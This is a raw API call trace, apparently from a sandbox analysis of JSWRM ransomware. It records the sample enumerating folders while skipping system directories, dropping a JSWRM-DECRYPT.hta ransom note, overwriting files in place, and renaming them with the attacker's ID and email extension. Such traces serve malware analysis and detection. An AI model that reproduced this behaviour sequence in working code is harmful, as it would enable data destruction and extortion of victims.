lpFindFileData=0x345f360*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x3d58, dwReserved0=0x60002, dwReserved1=0x20e44c, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 0 [0059.622] FindClose (in: hFindFile=0x231e80 | out: hFindFile=0x231e80) returned 1 [0059.623] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x233090 | out: hHeap=0x1e0000) returned 1 [0059.623] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20e418 | out: hHeap=0x1e0000) returned 1 [0059.623] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dde8 | out: hHeap=0x1e0000) returned 1 [0059.623] FindNextFileW (in: hFindFile=0x2321c0, lpFindFileData=0x345f6c8 | out: lpFindFileData=0x345f6c8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf371c69a, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfffffffe, dwReserved1=0x345f828, cFileName="1042", cAlternateFileName="")) returned 1 [0059.623] lstrcmpiW (lpString1="1042", lpString2=".") returned 1 [0059.623] lstrcmpiW (lpString1="1042", lpString2="..") returned 1 [0059.623] lstrcmpiW (lpString1="1042", lpString2="...") returned 1 [0059.623] lstrcmpiW (lpString1="1042", lpString2="windows") returned -1 [0059.623] lstrcmpiW (lpString1="1042", lpString2="recovery") returned -1 [0059.623] lstrcmpiW (lpString1="1042", lpString2="perflogs") returned -1 [0059.623] lstrcmpiW (lpString1="1042", lpString2="documents and settings") returned -1 [0059.623] lstrcmpiW (lpString1="1042", lpString2="$RECYCLE.BIN") returned 1 [0059.623] lstrcmpiW (lpString1="1042", lpString2="system volume information") returned -1 [0059.623] lstrcmpiW (lpString1="1042", lpString2="msocache") returned -1 [0059.623] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dde8 [0059.623] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20de78 | out: hHeap=0x1e0000) returned 1 [0059.623] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20de78 [0059.623] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c380 [0059.623] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x76) returned 0x225f30 [0059.623] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c380 | out: hHeap=0x1e0000) returned 1 [0059.623] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1042\\JSWRM-DECRYPT.hta" (normalized: "c:\\588bce7c90097ed212\\1042\\jswrm-decrypt.hta")) returned 0xffffffff [0059.623] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225f30 | out: hHeap=0x1e0000) returned 1 [0059.623] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0059.623] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345c52c, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0059.623] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241100 [0059.624] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1dc3) returned 0x23cc80 [0059.624] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241100 | out: hHeap=0x1e0000) returned 1 [0059.624] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2c92) returned 0x2471a8 [0059.624] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cc80 | out: hHeap=0x1e0000) returned 1 [0059.624] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c068 [0059.624] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x76) returned 0x225ab0 [0059.624] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c068 | out: hHeap=0x1e0000) returned 1 [0059.624] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1042\\JSWRM-DECRYPT.hta" (normalized: "c:\\588bce7c90097ed212\\1042\\jswrm-decrypt.hta"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x450 [0059.626] SetFilePointer (in: hFile=0x450, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0059.626] WriteFile (in: hFile=0x450, lpBuffer=0x345c640*, nNumberOfBytesToWrite=0x230c, lpNumberOfBytesWritten=0x345c60c, lpOverlapped=0x0 | out: lpBuffer=0x345c640*, lpNumberOfBytesWritten=0x345c60c*=0x230c, lpOverlapped=0x0) returned 1 [0059.627] CloseHandle (hObject=0x450) returned 1 [0059.628] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225ab0 | out: hHeap=0x1e0000) returned 1 [0059.628] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2471a8 | out: hHeap=0x1e0000) returned 1 [0059.628] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20de78 | out: hHeap=0x1e0000) returned 1 [0059.628] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20e418 [0059.628] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20de78 [0059.628] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dec0 [0059.628] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c538 [0059.628] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x76) returned 0x226530 [0059.628] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c538 | out: hHeap=0x1e0000) returned 1 [0059.628] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1042\\JSWRM-DECRYPT.hta" (normalized: "c:\\588bce7c90097ed212\\1042\\jswrm-decrypt.hta")) returned 0x20 [0059.628] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x226530 | out: hHeap=0x1e0000) returned 1 [0059.628] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dec0 | out: hHeap=0x1e0000) returned 1 [0059.628] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20e268 [0059.628] FindFirstFileW (in: lpFileName="C:\\588bce7c90097ed212\\1042\\*.*", lpFindFileData=0x345f360 | out: lpFindFileData=0x345f360*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf371c69a, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf38014a5, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0x1a347e1d, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x20e44c, cFileName=".", cAlternateFileName="")) returned 0x232000 [0059.628] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0059.628] FindNextFileW (in: hFindFile=0x232000, lpFindFileData=0x345f360 | out: lpFindFileData=0x345f360*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf371c69a, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf38014a5, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0x1a347e1d, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x20e44c, cFileName="..", cAlternateFileName="")) returned 1 [0059.628] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0059.628] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0059.628] FindNextFileW (in: hFindFile=0x232000, lpFindFileData=0x345f360 | out: lpFindFileData=0x345f360*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x69d9e300, ftCreationTime.dwHighDateTime=0x1cac0d3, ftLastAccessTime.dwLowDateTime=0x69d9e300, ftLastAccessTime.dwHighDateTime=0x1cac0d3, ftLastWriteTime.dwLowDateTime=0x69d9e300, ftLastWriteTime.dwHighDateTime=0x1cac0d3, nFileSizeHigh=0x0, nFileSizeLow=0x318f, dwReserved0=0x60002, dwReserved1=0x20e44c, cFileName="eula.rtf", cAlternateFileName="")) returned 1 [0059.628] lstrcmpiW (lpString1="eula.rtf", lpString2=".") returned 1 [0059.628] lstrcmpiW (lpString1="eula.rtf", lpString2="..") returned 1 [0059.628] lstrcmpiW (lpString1="eula.rtf", lpString2="...") returned 1 [0059.628] lstrcmpiW (lpString1="eula.rtf", lpString2="windows") returned -1 [0059.629] lstrcmpiW (lpString1="eula.rtf", lpString2="recovery") returned -1 [0059.629] lstrcmpiW (lpString1="eula.rtf", lpString2="perflogs") returned -1 [0059.629] lstrcmpiW (lpString1="eula.rtf", lpString2="documents and settings") returned 1 [0059.629] lstrcmpiW (lpString1="eula.rtf", lpString2="$RECYCLE.BIN") returned 1 [0059.629] lstrcmpiW (lpString1="eula.rtf", lpString2="system volume information") returned -1 [0059.629] lstrcmpiW (lpString1="eula.rtf", lpString2="msocache") returned -1 [0059.629] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413a8 [0059.629] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="eula.rtf", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0059.629] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="eula.rtf", cchWideChar=8, lpMultiByteStr=0x345f610, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="eula.rtf", lpUsedDefaultChar=0x0) returned 8 [0059.629] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413a8 | out: hHeap=0x1e0000) returned 1 [0059.629] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241178 [0059.629] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="eula.rtf", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0059.629] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="eula.rtf", cchWideChar=8, lpMultiByteStr=0x345f5e0, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="eula.rtf", lpUsedDefaultChar=0x0) returned 8 [0059.629] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241178 | out: hHeap=0x1e0000) returned 1 [0059.629] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22bf08 [0059.629] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20e268 | out: hHeap=0x1e0000) returned 1 [0059.629] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0059.629] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345f334, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0059.629] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22bf60 [0059.629] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1042\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1042\\eula.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3d4 [0059.629] GetFileSizeEx (in: hFile=0x3d4, lpFileSize=0x345f2c8 | out: lpFileSize=0x345f2c8*=12687) returned 1 [0059.629] SetFilePointer (in: hFile=0x3d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0059.629] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x3180) returned 0x2471a8 [0059.629] ReadFile (in: hFile=0x3d4, lpBuffer=0x2471a8, nNumberOfBytesToRead=0x3180, lpNumberOfBytesRead=0x345f2d4, lpOverlapped=0x0 | out: lpBuffer=0x2471a8*, lpNumberOfBytesRead=0x345f2d4*=0x3180, lpOverlapped=0x0) returned 1 [0059.631] SetFilePointer (in: hFile=0x3d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0059.631] WriteFile (in: hFile=0x3d4, lpBuffer=0x2471a8*, nNumberOfBytesToWrite=0x3180, lpNumberOfBytesWritten=0x345f2d0, lpOverlapped=0x0 | out: lpBuffer=0x2471a8*, lpNumberOfBytesWritten=0x345f2d0*=0x3180, lpOverlapped=0x0) returned 1 [0059.632] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2471a8 | out: hHeap=0x1e0000) returned 1 [0059.632] CloseHandle (hObject=0x3d4) returned 1 [0059.632] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c220 [0059.632] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0059.632] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d4c8 [0059.633] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d4c8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0059.633] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d458 [0059.633] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d4c8 | out: hHeap=0x1e0000) returned 1 [0059.633] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0059.633] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a468 [0059.633] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a468, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0059.633] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a468 | out: hHeap=0x1e0000) returned 1 [0059.633] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232e88 [0059.633] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x8e) returned 0x23b400 [0059.633] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232e88 | out: hHeap=0x1e0000) returned 1 [0059.633] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd4) returned 0x1fc808 [0059.633] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0059.633] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d458 | out: hHeap=0x1e0000) returned 1 [0059.633] MoveFileW (lpExistingFileName="C:\\588bce7c90097ed212\\1042\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1042\\eula.rtf"), lpNewFileName="C:\\588bce7c90097ed212\\1042\\eula.rtf.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\588bce7c90097ed212\\1042\\eula.rtf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0059.633] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0059.633] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c220 | out: hHeap=0x1e0000) returned 1 [0059.633] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22bf60 | out: hHeap=0x1e0000) returned 1 [0059.633] FindNextFileW (in: hFindFile=0x232000, lpFindFileData=0x345f360 | out: lpFindFileData=0x345f360*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1a347e1d, ftCreationTime.dwHighDateTime=0x1d53d3c, ftLastAccessTime.dwLowDateTime=0x1a347e1d, ftLastAccessTime.dwHighDateTime=0x1d53d3c, ftLastWriteTime.dwLowDateTime=0x1a347e1d, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x230c, dwReserved0=0x60002, dwReserved1=0x20e44c, cFileName="JSWRM-DECRYPT.hta", cAlternateFileName="JSWRM-~1.HTA")) returned 1 [0059.633] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2=".") returned 1 [0059.633] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="..") returned 1 [0059.633] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="...") returned 1 [0059.634] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="windows") returned -1 [0059.634] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="recovery") returned -1 [0059.634] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="perflogs") returned -1 [0059.634] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="documents and settings") returned 1 [0059.634] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="$RECYCLE.BIN") returned 1 [0059.634] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="system volume information") returned -1 [0059.634] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="msocache") returned -1 [0059.634] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d4c8 [0059.634] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0059.634] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241358 [0059.634] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x241358, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0059.634] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d4c8 | out: hHeap=0x1e0000) returned 1 [0059.634] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d458 [0059.634] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0059.634] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241290 [0059.634] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x241290, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0059.634] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d458 | out: hHeap=0x1e0000) returned 1 [0059.634] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232e88 [0059.634] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22bf08 | out: hHeap=0x1e0000) returned 1 [0059.634] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241290 | out: hHeap=0x1e0000) returned 1 [0059.634] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241358 | out: hHeap=0x1e0000) returned 1 [0059.634] FindNextFileW (in: hFindFile=0x232000, lpFindFileData=0x345f360 | out: lpFindFileData=0x345f360*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5398dc00, ftCreationTime.dwHighDateTime=0x1cac6fe, ftLastAccessTime.dwLowDateTime=0x5398dc00, ftLastAccessTime.dwHighDateTime=0x1cac6fe, ftLastWriteTime.dwLowDateTime=0x5398dc00, ftLastWriteTime.dwHighDateTime=0x1cac6fe, nFileSizeHigh=0x0, nFileSizeLow=0xfed6, dwReserved0=0x60002, dwReserved1=0x20e44c, cFileName="LocalizedData.xml", cAlternateFileName="LOCALI~1.XML")) returned 1 [0059.634] lstrcmpiW (lpString1="LocalizedData.xml", lpString2=".") returned 1 [0059.634] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="..") returned 1 [0059.634] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="...") returned 1 [0059.634] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="windows") returned -1 [0059.634] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="recovery") returned -1 [0059.634] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="perflogs") returned -1 [0059.634] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="documents and settings") returned 1 [0059.634] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="$RECYCLE.BIN") returned 1 [0059.634] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="system volume information") returned -1 [0059.634] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="msocache") returned -1 [0059.634] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d490 [0059.634] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LocalizedData.xml", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0059.634] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241358 [0059.635] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LocalizedData.xml", cchWideChar=17, lpMultiByteStr=0x241358, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="LocalizedData.xml", lpUsedDefaultChar=0x0) returned 17 [0059.635] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d490 | out: hHeap=0x1e0000) returned 1 [0059.635] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d4c8 [0059.635] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LocalizedData.xml", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0059.635] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411f0 [0059.635] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LocalizedData.xml", cchWideChar=17, lpMultiByteStr=0x2411f0, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="LocalizedData.xml", lpUsedDefaultChar=0x0) returned 17 [0059.635] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d4c8 | out: hHeap=0x1e0000) returned 1 [0059.635] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232fc0 [0059.635] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232e88 | out: hHeap=0x1e0000) returned 1 [0059.635] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0059.635] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345f334, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0059.635] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232c80 [0059.635] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1042\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1042\\localizeddata.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3d4 [0059.635] GetFileSizeEx (in: hFile=0x3d4, lpFileSize=0x345f2c8 | out: lpFileSize=0x345f2c8*=65238) returned 1 [0059.635] SetFilePointer (in: hFile=0x3d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0059.635] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xfed0) returned 0x2471a8 [0059.635] ReadFile (in: hFile=0x3d4, lpBuffer=0x2471a8, nNumberOfBytesToRead=0xfed0, lpNumberOfBytesRead=0x345f2d4, lpOverlapped=0x0 | out: lpBuffer=0x2471a8*, lpNumberOfBytesRead=0x345f2d4*=0xfed0, lpOverlapped=0x0) returned 1 [0059.693] SetFilePointer (in: hFile=0x3d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0059.693] WriteFile (in: hFile=0x3d4, lpBuffer=0x2471a8*, nNumberOfBytesToWrite=0xfed0, lpNumberOfBytesWritten=0x345f2d0, lpOverlapped=0x0 | out: lpBuffer=0x2471a8*, lpNumberOfBytesWritten=0x345f2d0*=0xfed0, lpOverlapped=0x0) returned 1 [0059.693] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2471a8 | out: hHeap=0x1e0000) returned 1 [0059.694] CloseHandle (hObject=0x3d4) returned 1 [0059.696] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x233160 [0059.696] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0059.696] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d458 [0059.696] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d458, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0059.696] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d490 [0059.696] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d458 | out: hHeap=0x1e0000) returned 1 [0059.696] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, 